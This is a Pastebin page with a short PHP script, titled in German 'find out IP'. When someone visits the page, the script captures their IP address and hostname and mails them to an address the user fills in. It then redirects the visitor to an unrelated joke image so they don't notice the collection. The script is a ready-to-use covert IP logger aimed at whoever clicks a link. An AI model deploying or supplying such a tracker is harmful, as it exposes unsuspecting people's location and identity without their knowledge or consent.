Guest User

IP HERAUSFINDEN - CODE

a guest
Nov 30th, 2015
12,478
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.38 KB | None | 0 0
  1. <?php
  2.  
  3. $IP = $_SERVER['REMOTE_ADDR'];
  4. $HOST = gethostbyaddr($_SERVER['REMOTE_ADDR']);
  5.  
  6. $header = "[email protected]";
  7.  
  8. mail("HIER DEINE MAIL EINTRAGEN", "IP von: ".$HOST."Diese Daten wurden mittels Php gesendet.
  9. IP: ".$IP."
  10. Host :".$HOST);
  11.  
  12. header('Location: http://allrights.nicobartes.com/facebook-sprueche/wp-content/uploads/2013/02/45-This-is-a-nudelholz.jpg');
  13. exit();
  14.  
  15.  
  16. ?>
Advertisement
Comments
Add Comment
Please, Sign In to add comment